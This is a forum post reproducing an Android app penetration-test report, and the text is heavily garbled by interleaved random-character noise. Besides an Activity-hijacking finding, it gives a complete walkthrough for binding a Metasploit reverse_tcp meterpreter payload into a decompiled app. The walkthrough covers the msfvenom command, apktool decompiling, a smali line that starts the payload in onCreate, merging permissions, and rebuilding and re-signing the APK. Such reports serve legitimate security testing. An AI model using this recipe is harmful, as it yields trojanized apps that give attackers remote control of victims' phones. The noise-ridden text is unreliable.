原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

admin · 发表于 2022-6-8 20:32:44

" B1 Y3 F( O4 ^, q& D: r, {) ]% A) P- V8 s
5 N* B! z1 z+ K/ ?3 o& l t! T: |. U7 f$ V0 y- `1 ?

# f+ ?* y3 o+ Z9 I+ x, N9 @ L; H7 g' l" }: R$ w 文档编号： 1 w' a$ e" O3 T 3 }3 I+ {7 }) j& w4 S

; t7 K( k6 u# ?2 @0 G) q7 p3 t5 e$ s- U# z w : H+ v( O7 i5 Z5 K 5 @6 i& k. S+ ^

+ s# M5 O, Y! r; `* A. Y 7 U5 q' D& c" F/ I) @' r % c2 @2 e7 p1 Z ! ^: c) i- J, N: j2 b2 L& }

4 ^% R7 H$ N7 Z' S( a & g V3 a& g# S" B9 \ y- o7 k) R Z: h4 ]4 v 3 o% j- I; U* D3 o

6 q* u w" i0 k4 @5 R# @8 o7 x3 [/ k, |( `3 P 7 ~- T6 c/ P6 w1 K: @) l" Y$ q , B: b% V; F" E2 ]% I

' x+ Z- z3 G" V8 {& A 5 m) L7 i& h. M! z 1 |0 v. E8 ?/ l0 ~ 7 h- |3 @6 |' t$ l

: G: K: u- m; @6 I | 8 O- G5 q" f( ~8 i7 a. ?# x4 p* Q 某某某APP渗透测试 5 s6 L! I2 ~7 x1 x + T$ I% s* h$ p! V( B; m0 ^( H

; S" Y) _; F% W' M2 P) I , q7 |$ R+ K4 Y + A& m" o2 |) V- I; k2 c $ a m- g* w1 B5 r

6 k! V8 c, B3 @3 H$ T+ K 5 { i: A# q' I4 Y3 E5 k/ O ) V# x; A% _* x 1 d A; \% B4 S. g3 [

, {0 z- i5 `( t, S: p1 p % l3 z7 ~- p& ?# o, w. y + n2 |+ X$ r# z0 W: v 0 H3 J) ]; J2 w1 O& v/ }: o

4 u9 E* i' u% z2 p 3 G! L9 i! c( s2 J, q2 ^. X / X, |+ L' t; w8 F& w9 A' M) j* ?" A6 p2 J7 @

" _. c! s. A1 _) U$ K 3 h6 t( I& D" C! P/ z, }8 k 技术报告 1 O) w: I( K* b% ~4 d 9 l( a0 _& R2 D% s- r

7 a7 H; q6 q8 P( v : e2 A2 q7 Z3 o, D, Y7 m 5 u/ }$ z/ J4 f( g1 C' S1 ` 1 m. O! u' b. B9 Z. e+ E( v

2 e2 }7 y2 u1 \" s G ) p" |$ h7 _1 u; h" ]: q9 Q' O) x9 r / {5 J+ ^# D: o8 t 5 _' C2 Q& {$ q, K/ c# d

( a- a. k. F7 h% W/ N- B) \ . z2 H( E! W0 f1 U6 X0 R 8 n" O6 v' G6 B, T( K ' n/ `3 O; H8 L" V

5 w$ j4 y) t4 i( K* T- i `2 g b0 s3 }& L 7 L: M2 x: X4 E$ E : u6 U6 s6 X$ w% Y" A& j. q

3 `: F+ b; [" `1 d7 s. j) z * q2 V: J2 e' a, X ! _9 }" S% ^; p; N2 J4 O) }8 J' ?

" y* @' ^$ @* M/ K+ r$ x ( v4 l; O( R2 S+ J: L* H , c2 C; G3 J( `: l# ` - f* O2 ^9 l6 ~4 i: E' \' g

1 A, o1 {$ y- L + s$ m. G1 a2 S8 a4 t $ l* A' {/ t G- Y) K 4 C0 u3 }+ e4 E# H' q

- E. V% e/ T7 M! w3 X; M+ j& H3 M: p' p( K. Z% E7 S$ q % E' {8 |9 G( D4 l5 ^" I% L3 [7 t, N

" T$ G2 k- ]6 }0 h% A/ @3 b$ \ ; Q- @3 t1 a6 d9 H: Y( f% V! b % _6 ^3 S; @/ m" J' n6 z 4 n, Z+ J& C: U: c

) Y' `1 ^5 I0 i( |. R # b3 u$ {' D0 Q) b: w7 p0 M1 o f / b Y3 \- T4 z9 h& P# J1 M 8 f/ U: c" `. F5 S

/ y$ U# U5 s6 H* h2 a5 `% `' m& E" d" `2 S/ T9 v 4 I1 A3 j8 R% T , L0 G0 u& B# e/ b1 Y" n

' @( f! F' V! J 7 \7 @0 \5 D: K0 L3 } 3 b2 Q3 s) ^. G! T & c9 K" s' n5 j* b: p

. ~2 {- B! u* ]) M" @ $ x j* @0 P3 D: A- R1 _. n( S % |2 t6 z/ ~3 c # \8 [) R0 |7 e1 ]$ Q& h7 G6 g

( y% T: f: M* T; f. O- j1 b, Z3 ?% M2 U1 ?( ~ ! S3 b3 S: A, k; f* | ( o& d# j: o& w, u5 h

2 m9 x+ Q1 x. G$ z" l2 C+ t9 o$ g! m8 {' J( k% u 4 b5 @$ w2 T3 a! S% _ * `3 A" z2 f0 Q3 O- q. l

* S0 Q% t x, {7 \* V7 d# i y 6 Q' D5 U8 C+ @% @ 4 B* U1 s8 v# _+ S3 m9 M9 d( U6 M) X; }+ f; D( @) D( N

) ~4 ?* Z. W& r+ e 8 U2 ]0 t0 a$ a6 L " c; j4 P5 o; {9 J7 c/ H. p + c, [+ g8 h* I

, V$ P/ Q6 L) n) N 0 a h& ]5 W: u' n0 x 9 U* N/ y/ a4 s8 j: I; p . s/ l+ t5 i4 t% g8 m( R

! D: ^* E Q: z* v" V ! O9 g& p, f% ~ @0 u9 U% x$ {" x& m: N 二〇二〇年 * K7 z+ \$ N. V( W4 g h4 i . ]( c3 J2 o6 W! V: ^

1 V: l5 Q; C6 s* f) t' j3 C& M( J7 U& m# o& ]7 h0 K 目录 $ g' S+ W4 B9 V7 {9 n3 z5 j$ g) } 8 q) A. H7 j. L, Y9 k

) A; M7 p9 x) { 8 z5 B; \$ T8 S + |; V( X4 O6 v 9 `5 `. I3 c" C& P4 q

. N2 p7 V- F0 a" w2 | " P4 r' d+ t, ^ ?% P 1 概述... 3 + q$ {& W# u+ n. I9 [ / D) ~" z: D) B

/ H# ]! M0 N0 I. k( C3 i! W! t) k( A( m 1.2测试时间... 3 7 t# T" M- X9 |, U0 P! `; M : j9 w5 E! y) }( h3 r+ i

9 a3 ?/ U2 \0 X3 x. x9 o - }8 I; x! t1 V) }3 ^+ E 1.3测试对象... 3 " B. T, q$ M5 t) R4 H ' M% O" M% K. \& m3 ^% M5 x

4 L& Y+ N- b6 z6 v y' r8 h+ c9 w5 O7 ` . U# m+ @: D+ |7 Q' K/ V+ J2 _4 x+ F 1.4测试结果... 3 & o5 }/ ~6 t9 M3 z4 _' K/ D( {- q( u" n. N1 Z! s

; s6 x: {& b7 P8 k+ ^# X5 \* G ]4 J) y- u; c/ ` 2 检测结果... 4 5 C0 [0 G+ e4 I) G6 Q* L / z$ H: \7 i& d. u8 i6 ?) a J" I% F- {

8 T& q1 Q" M9 Y) j' Z& h 5 d$ Y4 A0 s; I- I 2.1 某某某... 4 ) V% l$ K- G2 j1 x2 n2 n" R' d& M8 G; ~

8 \2 W, k. y( x& h/ P4 K 1 [6 X [$ U) ]9 E+ l3 m 2.1.1检测目标... 4 4 j4 ^; i+ N2 ?$ ]* a$ O! _; i8 Z1 W! ^9 p- ^2 \

1 R; r% D% G3 O ( L0 E2 p7 d; H 2.1.2检测结果... 4 # s$ |; _4 Y' n" ]) r) w$ ~ ) z' P1 t# I A1 v+ ?4 l$ y% P8 Z

7 y3 U O, j: p; U# ~$ C1 | - R, |9 n- H; M7 d" N& G3 [- y1 c 2.1.2.1. 4 , F% r9 X; ?* O$ d# j( B , j- z+ X) i: y; D! L. x+ p

8 a2 ^8 _4 p& p9 T- R) r7 H v } ( e- E9 V" K! o% \/ A( ~" z C( X: R 2.1.2.2. 6 7 u( J0 O& i6 K7 b# E 4 R& x/ \1 n& [6 y$ G

. @* Y3 ?. D# F- j+ u' i, G $ b/ v1 B: q4 O- W1 P2 S9 ^/ ^ $ ]! m' ^, J* v0 Q& F( K1 q W% p * T0 ]0 y* t3 G

( b: I" H4 H# ?6 B8 n; {" D2 u% Y" f3 n8 i, A) j 1 概述 % r! i ?& {0 {, i , t. G: c% `" L0 g3 u

" m' b" v6 F) b% ]+ Y9 r( |; p& H 8 a: l7 d0 t! Q+ V$ v# ] 1.2测试时间 2 H: ?3 W+ ?9 b 4 E9 ?- [" p, P+ F9 J

" \|1 \' \|0 ?4 c. H' U9 x0 u: z 3 T: l# o! I% }/ D) I% g 4 Y \1 {& v& p" N& U. V$ U. V2 u* V# J6 v, X; W2 N0 G4 U" i 渗透测试时间 9 g2 q Q/ G+ r5 G; m ) R* T" R- C5 t) }% j 8 s4 d3 Y- a d: @; y " [& G0 W& R9 X. H. s# g
+ I. n y& q( u7 P6 l3 u / \|9 s" H5 d4 C0 H5 I( ^6 F 1 L& \- Z$ ]3 s: P7 P; T5 b& P# E , z8 i, ?% ?; ^, N" e* x6 F 起始时间 $ H- Q/ o" m* S2 b- D" a6 f3 k& P H0 k8 ~0 ^, T3 R; y( D2 J; }2 I $ e& I, v) @3 n# ^- H! y; \|% j. e 0 j3 x5 [2 ^* _0 G	+ H+ B! Y( A0 c5 r! h7 X# D( ]5 \3 O, m/ ^' Q. J: w* }: W. B 4 A2 g4 Y( u$ \|% K- g0 H% [5 T5 ~3 T' Z9 U& W 2020年4月6日 . \8 B& ]/ C# [ ) I! ~4 B3 m6 Q4 M' G/ F# A6 Y+ @ . u3 o u: M' {! j 2 O9 S' \" A1 c C9 Z
( [- k' ]6 ^/ J7 ~# q - [& x: ^- [. v( k* H) Y 5 [# f- l; T3 S) X9 O! t ; r) t; D; r3 h% X; C, y& ] 结束时间 / D5 B1 h# j8 Z! s4 y2 ~9 b. S : i* k7 P$ V1 X+ n8 k5 T3 ^ ( [6 z* y7 [9 {3 ^$ T# w& c9 g$ h 9 l @0 H. ], V' W; i	, ?" ~7 }/ t# y7 L, N 0 M$ B. p+ h2 a! E9 K0 z9 ? ( Q- e2 o% I1 u6 K & e0 ?* q1 a, Y3 ^0 i& m6 P 2020年4月9日 + Y2 _* k, i5 Q" h& F; p3 G1 Q% l2 b% `8 G2 J7 X2 n " N2 R/ h) a- j( U7 P* I$ L K5 b* p8 Y8 S

' D2 j+ y+ G" k$ P! X4 I: v& a& A' |* O* X/ y 1.3测试对象 8 o) L0 a+ }3 Z* C, L% M* _, T 9 G x9 @! q3 N* z! p& O" g

/ w0 }- A9 J( ? ( F9 J* q& `" @# O. I 此次测试目标为某某某安卓APP进行渗透性测试，APP存在安全漏洞数量如下表所示： - P6 J% ] ]6 e& {; ~& N3 x3 {/ b # Y5 |) i" T; |4 s/ k

. `5 i( i; X0 J x% S) G. s' f, W & p# c! H+ ~/ v) \5 B6 B1 E+ {2 Z 表1-1 检测对象 / q+ p/ |4 L: Q% |# _6 b4 Y/ z$ K , p( ?1 A0 g# |

. R/ E2 u, t/ m: q B $ }" d% ~) t. {8 G3 r! l, v 2 ^, `- s9 C0 e 4 M" p* E7 l) ~4 b/ H" ? 序号 # m) Y8 c5 a8 E# {6 \" d2 \/ \|- h" F" z. [; w4 [! h. z& @ 6 o, k k6 K9 o9 J. m- J& T/ k) l- t) c	7 M1 a& k; m6 Z o 7 c* Z0 E6 m& ?& P 6 i$ ~. ^, Z+ B9 E 5 r* N* j9 G" I$ \|8 J0 E% [ 测试对象 @4 y2 H; c o( H 0 x0 A y5 L3 r7 f, o % S2 C2 r/ I9 X3 G( M6 {! T $ M) X' O7 A$ x, i	* u; M( F. s H! b& Y1 ?, \| ( \( g9 ^* }, i2 y ! k9 @7 G/ c' R/ C k' A. u U5 ~3 o; p! f1 r: o3 Z 测试地址 + L% y, o- J) a y' t* Y , B- u! k& F; ]+ W 7 G8 z+ l2 l8 D* W6 @0 K3 v& ~ # p# ?% G$ S" [1 Z' @. Q9 e	6 D: q) v* }* z& Q7 \|) \|: ~ * C; ?& {: `- u8 y6 G$ V( t0 r" k* v % K- [2 L, K7 Q% a" ] ! \|; {# o1 g! k9 k 安全漏洞 * I4 J$ v- \|' @( N ' \|0 H! w9 t/ _! U / U# X \|6 \|! s9 M6 Z9 S. E! F) C' w, A" H* V
) U( z$ K {6 J( \2 R * I$ L8 [0 Y$ A # x t$ t9 B) j6 m, z6 P$ \|" o) m 1 ( F7 P" J: m2 U* \| ' R2 T) d6 @" B P" U # X0 G8 \|3 e& Q2 \|" v, O s4 C( d8 f: F5 g7 b( Q; X7 G/ G	% Y: h: g% d0 k% C" W5 n ) _6 J1 K+ m0 d! z + F8 }6 T' N* b# J) B 0 \) `/ b5 s! {9 f9 D( }) D 某某某安卓APP 0 Q) j# V4 O. a& V$ J # D7 e% `& ?* {( b; D+ n * m& f: D& l8 G' Q: v) _ * L1 M5 Q9 t' `# X) F	3 N9 M) G+ {. `0 M1 v8 B; K+ d2 }' N1 W + S* w, c7 p5 x2 F1 [, T0 D% C; h 5 z6 o$ i6 O6 ~7 u1 b; y2 `; B9 o3 u- z0 o9 }. k $ ?3 G% e- s0 F* h# x ) ?9 h6 W1 W2 v& f! s+ v3 S & J( b3 `7 ^. Z1 ?" o' x8 ]. f) d ' ^5 \|; C! `4 o$ [, T9 z/ y% z# y	: [+ J6 \7 i W1 m& { ' u3 F( `2 x9 V2 e; L # n) p x7 E7 U0 H) H5 o/ ^ 9 l' A- [. X3 A7 g 2 3 h8 v, B# i; G4 J. { a + D/ Y( k$ \" c+ _! t $ u6 U+ f' W; @- L' F 8 ^6 A/ }- H) c7 W! @6 V( \( P

0 c/ p* j& [, j5 {% K' K ( Z, j' T7 H+ _, g( I5 m& v 1.4测试结果 ) b# v9 M7 k6 P0 Q# d# a5 p! B 0 P- S) P S, T. k9 e& @- K* s, l- |

, H" X: g L$ V N+ |' V) C 4 [. N* ?$ f( O! j 在本次对某某某APP透测试中发现，APP安全防护存在一定问题，主要问题如下所示： + A u, U( X2 q* ~+ B: Q # O5 X' f6 A; `" |8 E: X5 Y5 V `

. @- v1 f2 E6 I' ?7 X $ k, H5 c8 O/ g- P( G $ e a) K2 \1 t 1 I/ I6 |7 S3 I- y. b1 G2 k

4 G" {! M @6 y& f3 k' z( p$ T! T* p + S6 u' T* }0 \, o9 D: b# t* { 序号 4 e+ b8 ~8 C! p ( H. N. c/ v, {1 B3 }5 Q; J

% i% a; N: }$ W3 [ q& w# h 2 J, J0 Y. R5 G7 b. I' C 系统名称 9 i7 u9 D* T* a# A1 I 4 a$ E8 O9 z' e7 \! {% n

/ }# H ~. l2 r5 d& S# h! { . X: Z/ i+ B: S/ i% u( I 漏洞名称 f1 b; Z' O2 P9 ~ ]0 l ) a P- G. \- J( ^5 ]' N

: t& A) X0 n: n 5 p' y0 W, y7 x 漏洞危害 ( w) B' M. E( {! E ; D5 y7 A" @+ ?) e

$ ^* a5 r% b8 q9 s: v4 p) V, G! _ 3 Y6 Q! u6 Q6 c8 A" g4 R h2 h 修复结果 5 I% Z! C* ^* L. H" P 3 f5 K$ f4 }7 i8 p2 ^) S+ | M

" V; Z+ X) N3 p7 _$ Y$ }2 G+ x7 t ! V: C8 @, ` I N, U6 _ 1 4 w9 n; {8 ]0 D+ s 2 S4 V" Y" ]4 W9 L1 q

; j+ W2 A: L9 m- v) i ) k' P% c9 Q" y$ C/ J) w 某某某某某某APP 7 F# d- ^1 D, a3 I3 n [7 V+ J3 D) H; R, o

6 ^' `+ M& N6 U $ ^- V4 M& q3 R v" @* W1 ?. w8 X Activity 劫持 , z! i& m' l% j ( E8 I! @; Y* A/ x1 G

! e+ c' Y; }; C7 c% Q, `1 u% T& H7 L$ H/ k + k8 U" L5 {: T5 O6 y/ u3 C) ~0 u: Z% X. ?( p7 r0 I

, j; H' _) S$ }9 M v! k $ o& Q1 V7 ~7 {% t 高 ' b* Z1 L2 N+ n' ~; @' w: u" i- H" t. `2 _

( O& e$ Z) h3 E5 k " A% H% W7 _% _& v' s 6 E* d7 d0 Y! p4 r 0 d' M/ s7 r9 n5 g4 N* l

! L4 e- T! L$ d$ G6 e & c. a8 e' Q9 \ 2 6 E# J. ?0 k% l3 v( [ ?. K, h3 e; G: W c! @- v

, E7 L' o2 S' K4 f7 U/ G + E( \4 E4 S% v0 ]* k8 ?9 e( B 某某某某某某APP * s- w9 a7 Q3 T+ Y $ y9 r% ~" g: v2 |( Y7 h

3 p+ O/ A- I2 E: d$ H ; D- j! p9 ~: \% S 反编译二次打包捆绑木马、篡改APP代码 / Y( A5 Y) p+ G8 O2 G1 D/ J- h% C4 C" z' b; d2 q7 \& j6 s; c+ @

1 M& A u8 @$ b6 R 8 Z2 B. s; _$ k: c+ k 高 $ b' G ?' _0 h* F$ R2 A! H) i1 G$ r

9 r, [" _9 w9 E8 T # @& Z7 s) S* f/ L% l . h J' C: T- C . w7 {! g" U7 y' b' a' T7 [* d1 {5 s

) f5 v- Z O! @* H. u 2 Z, \8 W! K6 K1 F , d5 m1 b, C. } T- Y, }# \: j- G $ f- t4 |8 l8 _+ A! M( J

) k0 b0 Z; i7 w$ p6 f0 F1 Z - ?8 E- M& y9 p9 n 表1-2 测试结果 3 Y0 W, }9 f3 C* s# V8 ^' k0 Q; N! h, k4 Z

' F. j' K; s% R0 D+ i3 J S& S5 \. }( A% Z9 P# ^$ L " E& b% j( Y. Y, z/ {, L3 u! h$ h

% {2 S$ | S% ]& K* S , Z. s# {) f6 P 2 检测结果 & a+ l# v3 x1 c( _ # Y+ i* H( T6 q

* c+ ~8 X2 _! E 6 C4 U8 P+ A4 o' ?9 ^" S 2.1 某某某 " z1 r- t8 m1 {: K4 x8 g' ~+ S" x 7 j+ r+ J2 X& }

# R2 i, X! y# q% \/ S0 H; ^; S8 p3 p' ]: c# d' f8 k 2.1.1检测目标 7 d# h* G( N! h$ _' a1 f $ i2 f' O6 I, [, J ]* \1 Y' T

% S2 I* b6 A( p4 C W( Q) J0 w5 X7 A( h) n 目标地址： 某某某某某某APP : ?- [# N) B6 L$ o8 t4 f) M3 \ 3 C" w/ |' F) c

! h" v3 t7 T% e9 _ . p% i+ ^8 r3 ^5 D+ `( y% R ] 2.1.2检测结果 . v3 i1 R) t% D& ^5 I/ @$ b- o6 G: V

4 ^& F. @; `0 d6 I- h $ z7 {! P+ L5 M/ g# G* I 2.1.2.1 6 H p5 |6 P! s, A X ! |' q; _$ r }1 [4 o; R

8 n- o( J8 [9 H6 W& O 1 }5 G; h I7 x" r+ t" H3 | 漏洞链接地址：某某某某某某APP " V0 G* C/ ~. i" C1 i- R/ B+ `8 X" \( b) \* n" Z- f

7 G2 w8 p: K2 p3 X* u) M5 z" l8 G 2 y7 e1 \$ o& y$ ?+ ` 3 _: P; C6 |% Q( }8 X& E ! s; _3 P1 i0 h; r" @

2 y, }6 O% R. f" h7 x: C0 p) k : @. u% v; T% X; ~2 U7 W 漏洞分析及取证： 5 D' o5 j& o6 N- A. q ' C- d4 `3 J% }9 V. N! S

( M1 ^6 G( I4 S% L) q ! a2 Q1 }/ g0 k: l" O0 y 通过androidkiiler反编译，发现app未进行安全加固， Activity 为com.minivision.cmcc.activity.SubActivity可被劫持，复现漏洞如图： # U& A0 O' `; C& I3 L- F0 s' P; i x/ E' i3 Q: U- u; \: P

" E" r5 Y2 o/ S. F$ F . X' q! _% z1 q3 y: ~# s ; L' y9 q" g- X% }0 ? 2 `+ y0 y7 q8 [6 Q: l$ ]* u

. ?2 }* g9 X9 o4 A6 } 7 M6 n9 Z4 s2 t( _ [7 l# N* P ! F2 l+ U) s# [. U0 a- ~ * K, ^1 d; f* [/ p7 C

+ H- N+ E+ r' w( u3 D & \# b! ~1 z( A9 a$ g _ 7 q" P3 s, S. @, N4 y 7 W3 R8 R0 n J, }

3 D% J! Z7 p" M& r x8 ]( R- V' P8 M( b# _* j# _, l . T8 t! A6 U( T6 R2 q2 n; E% f' f' N+ V' f; b

: D* [7 [8 ?9 I: p4 i ) @* o/ A9 S, X+ M( B# s) P 7 Y' w: g5 W4 |: C3 E2 N/ l8 v" I 9 C8 W" b- K+ M; N8 R

5 P! z1 J; s: Z. p o- F5 n" f! [: o9 u/ I 漏洞危害：高 % `6 Q- R3 y* x2 i; n! r6 Y: m% }6 t

: c, o% U7 k: W 3 b! A, @: j. d9 f6 A. @5 K B , ~/ E* k% \|, u/ K. v+ C. t3 Y! q( Y3 o 严重程度 3 A" {0 v2 f* u# t; F4 u6 \| ) F1 ]( v, h* u0 ^: x t / @$ ~+ `, H* O" Y: C+ }# K 8 B* \|( Z' ~ p	* d5 Z8 \& Y! z+ L& u- ?' H& Z + O" j0 w( M1 w2 B 6 C9 b1 X0 y8 v. {5 D& C$ z% E5 H/ ]* r& z+ f4 F 高 % F3 k+ `6 T" d/ C% U6 _% @& x' B' C 6 ^! S( N' l+ M* c9 H; y6 [ ' _% Y4 X8 E) L3 J% r+ g4 @; u 0 n Z! R( L2 j) u	# w3 O7 q) _. h' E d p5 V D! Y* \( W' ] " {* q$ Y( ?" k) u% \|0 F3 p+ j1 e3 y$ O6 [; }/ F5 f( ^ ■ : C: A, k! \. d3 }: R1 G! W # I( s6 K. g5 g. l- k7 j; E 8 Y4 s, g8 ?0 O3 F: X3 w' q7 a+ W$ x, i4 A2 f+ M	u* B# n R2 i1 C # v2 a7 ^+ ^# u; _/ ~* h* h + e7 T& m: _% O# R! y7 j0 M* i' f2 M( T9 L6 V2 s 中 ' }# T0 a$ C f Y2 { % P. l; g. g: Y, C- Q Y, {: ^ _$ \6 [- S * d# ~* X! V) v8 M	4 \0 j" a3 E0 G b0 G8 L8 f! P" K& ?8 u " v0 z! K% L$ I) n4 X. K6 ^! B. [' J( l ! C% U8 h$ E) A) w4 A; a + W6 {8 \' q: Z+ I: J0 S9 t0 b r& ^% \0 H% W( O' f* ]# P5 x; ?: m	( ]" H, d# A, P) Q& Z 4 w5 @- `0 U5 D. A & W, t# z& l1 f " l+ n s% v( d2 u3 y. w 低 & E3 y1 K+ ?* Z, C+ m' O7 _) L' d O6 e0 \| Z: T- u% R 5 K& r0 u* B5 l& t % _8 e$ i* x! g8 U	: B9 W. [4 h4 _2 `) v $ U+ {0 ]7 ]' ~! S4 b+ q " d# U( }& H0 `. h 1 \|# N0 G, J/ \) a7 t" _ $ x& r7 u% \# C k. ~ 9 Z2 J( a* s7 ~* z7 m o5 j5 h / C+ t/ Q5 R( ` , f1 ]: o6 ^' q9 e# q

; J6 ?# \5 S6 \& @! i5 ?/ i K2 G& E3 w5 P $ S/ C; x8 @: j% s# M & i$ \7 h+ X" b! X% ~- T

7 h& G6 n7 G+ C" K ; W: n2 F4 c0 o3 j' D 修复方法：在 APP 的 Activity 界面（也就是 MainActivity）中重写 onKeyDown 方法和 onPause 方法，当其被覆盖时，就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的（触摸返回键或 HOME 键），如果是用户自己触发的则无需弹出警示，否则弹出警示信息。 ' B. w& Y: l7 V# P/ D! L) y) l' k$ m! R7 }

0 }7 t5 E# }$ L8 w. J) N3 y) ^ 7 T# O5 e1 v7 n & ^ H# V1 v4 L+ J ) K/ F; [6 w; _) q L

" g% ?+ A& d1 Z2 ~ $ O$ T2 V# e& V3 h% Z* ^ ; q, o- ~) j' Z) N# F. L4 q; R* T) a2 ]3 Z6 P V1 s* J% M, }( b+ L9 D

; a$ Y. S6 I$ t $ @! h' [* s% m- s0 s$ f) b 2.1.2.2 . g- X: T3 h2 h B u" q ' W- _' J" H2 M K* [; E* r

% j# V/ {( K6 l1 M# s2 x/ v 5 _: b. M% _7 _+ L2 j 漏洞链接地址：某某某某某某APP 1 [6 e3 O7 e7 q% v0 d4 S$ y Q ?1 d( H/ _4 B9 ~

, e8 S. ?& o! z3 E- ? 4 l7 h1 Z1 r0 N, m1 f) @ 漏洞分析及取证： : E( p' C9 O+ x5 }, \. W- r7 Z' ?

# X3 z# C4 ]/ @ D$ Q! t( \7 _ E% D3 b. i7 _6 K$ P 通过反编译，发现程序未加壳加密，可直接反编译获取源码，经过测试可修改app代码捆绑木马或者植入广告等操作，复现详细方法如下： * k7 i! Y O1 ~; n2 m 4 p! a; n- {8 ?

3 c2 V5 r |' G, O" l5 M/ Q ' J: R/ Z9 p) h! Q2 @! Q% f$ a 用Metasploit 生成木马 apk % [) J, @* G9 [ D6 M7 u7 f 5 L. N4 ~6 k5 I, C/ d

5 X& ^8 E2 G4 \: j( _" o. l0 g3 g ; D, j b% c5 n. j: E8 M, Y msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 3 T- H3 \- N1 ~& i - N0 c/ ?1 o% W) u9 g1 c, t

! W8 C5 g% U2 x ( Q) [/ L2 p( u- M 反编译目标apk和木马apk " ~2 w8 Y2 L r$ w5 Q, G 5 D% B0 w$ \ o, H

6 A5 T+ w2 n4 @* f ; J' T' {# b; I7 T/ E. y1 e apktool d target.apk
3 [* G4 n& \/ [/ c + N& U. F* G# v! p2 I; x$ n0 F9 J apktool d cockhorse.apk " E' v3 C/ V2 a8 P8 M# C P$ t" L3 J# _. [# ?

6 h+ L8 N Z+ g" }4 }" K $ u2 B, K) G/ h R 木马 apk 注入目标 apk 3 ^0 o) }3 w% m" @$ ?! Z9 U1 S % `6 v6 y; M L: e) \) u9 ]0 I

+ z3 R4 {( B: o4 N4 ] 5 y C" q1 K2 K. a" R6 d 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件，并在 onCreate()方法中添加如下代码：
l6 X& r# d* t x" y9 e) D ! [: o/ Y8 K9 [" X3 m; r8 h2 v invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V + P d$ Y2 G5 k/ r9 m9 b- }* { 6 D* c/ }4 {5 j2 B

7 k; o4 P6 W- ]6 F 3 g0 ^! ?8 d7 o( G: z4 | 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中，去除重复 & e; i D7 b6 F9 D: i . m) `3 h# v6 A+ D: I m$ ~

5 }& V* J6 q# r* n% Z3 ]6 i 6 {* r8 ^# x# m 将木马文件的 smali 文件放到目标文件下，例如 com/metasploit 文件复制到目标文件 com/ 下 / l/ O4 Z: P# [( i' t( H 4 d8 _7 }$ Y2 }5 q; l( R

3 W& @9 V9 y/ h! x7 ~' h + J9 I& }) E3 G3 N1 n 回编译生成最终 apk * S. O- o0 G4 J8 b4 o( X0 I6 b- g ' J9 j) O3 f: B9 D0 R6 q

9 ~' W* m3 k- w) \$ } + \' ?% x; f! k/ k+ ` 重新打包 : e1 }+ A+ z/ \# z0 A: f2 P4 O, P4 j% B7 z9 J% i9 W( E$ X

& U- e$ N. K }& w# N- p1 {& @; L 8 b! n6 W5 U8 ?* c+ X8 v apktool b -o repackage.apk target_app_floder * }. I. x* ~/ \. Q; C ' J, \0 n; o9 M. r! k& }1 J

. X2 e" z; \5 K% \* F2 i% C3 c c4 {5 _/ X 创建签名文件，有的话可忽略此步骤 " V/ h" ~& N. U$ Z. X: j9 l7 v( o( ?4 t( v6 J9 P

2 L/ `9 g6 f% e& I* p' u + s- Q) w9 u8 e7 N keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 - O- p) Q- H+ l' i6 O+ A+ ~% a 2 h2 e) p9 q+ V. ]; s5 o# t* Z( {7 _

& [7 J/ y9 b3 B # z; m" c, S) |- r2 \0 \+ h 签名，以下任选其一 7 P/ a i. K% q( |% B% p 3 L4 c3 R+ R8 J! D1 @

' ^1 n" t* n7 X3 T, _( ^# M, t8 P. t 7 @* R- ~% |3 w N jarsigner 方式 5 l, Y" v, X% b, O. A* w6 }" l# ^4 k / Y8 }8 C! ]6 P2 v- `

% b5 L) U3 @& E& Z; e7 A f% m1 x9 j: Y% p jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname 0 U+ {! {0 ^/ Q& U8 [- ]2 @/ O0 I* J, e( o' [/ V T# n5 j1 V

2 m( l. s, P% H5 [. W9 M" h 0 l7 t4 ?# s9 j4 o$ `8 a apksigner 方式 % n6 L* x7 A J& x4 p" K8 W ; C z- F" C' k) Y3 M/ x

. {3 O& d2 a7 [: d# y" x/ A # X, ~4 T6 l: X i apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk . L3 w6 S& r; ~$ T# y 7 y9 c. c/ S- ^. s- Q

/ M8 A% m, R9 c2 v0 l6 W 4 i5 [4 u5 W' }9 E0 N0 O( F 如需要禁用 v2签名 添加选项--v2-signing-enabled false 0 @1 M" i; f( x# {4 w, ~ . i! y, `1 @! h. p0 n7 k' Q" |9 G

$ l4 \$ V7 M6 M l7 x/ r( X5 X8 X. o8 s$ H5 S 验证，以下任选其一 * V3 [* C% o( ~) y ( ?( N% J$ U/ t3 X0 |& Q/ a

- g/ }9 o U# f- M' G( R1 x4 N5 R- v; U9 E& \2 I) C9 X jarsigner方式 ) i: f) X( S. j1 C ) a' |# ]: J3 T9 d

6 ^9 e8 v! {# M$ D) v9 F 2 S. \* W. N- x0 ] jarsigner -verify repackaged.apk # _3 y( g* O3 G7 I `2 Q! @3 V+ H6 n, T+ L

7 }' x: Z) ?, B$ R- Q; u , |6 W7 x3 @+ w apksigner 方式 * N5 W u' J- h. D% F * O K9 J' t+ ]- Y0 c

" ]8 r8 v% H C- v " x3 b4 l8 O4 B% d apksigner verify -v --print-certs repackaged.apk ! T! K3 u# ^7 N; S/ o. O' _/ {& | ]( C2 K6 V, o# Q! R* j- U% \

2 w5 W0 v; s3 h& o . u, q X/ g2 ^' h keytool方式 0 |) y' Z$ w+ f. ~ 3 T& k* f' f/ f0 G" x7 m

) ]: k4 v( o5 Y/ [+ {! r% J, r& b7 R 9 B2 s- |9 T6 V keytool -printcert -jarfile repackaged.apk ) o# w0 }3 f3 j3 ~" |/ ?& \9 @ ! }- b* v- T1 O P0 X; K* X0 d

3 }" R- s [$ W) v, \+ F: Y7 z " `/ R% k$ A4 h6 j. _, }+ } 对齐 . c6 Z' y2 x/ ^1 S: [! [$ `6 j, Q S9 ]

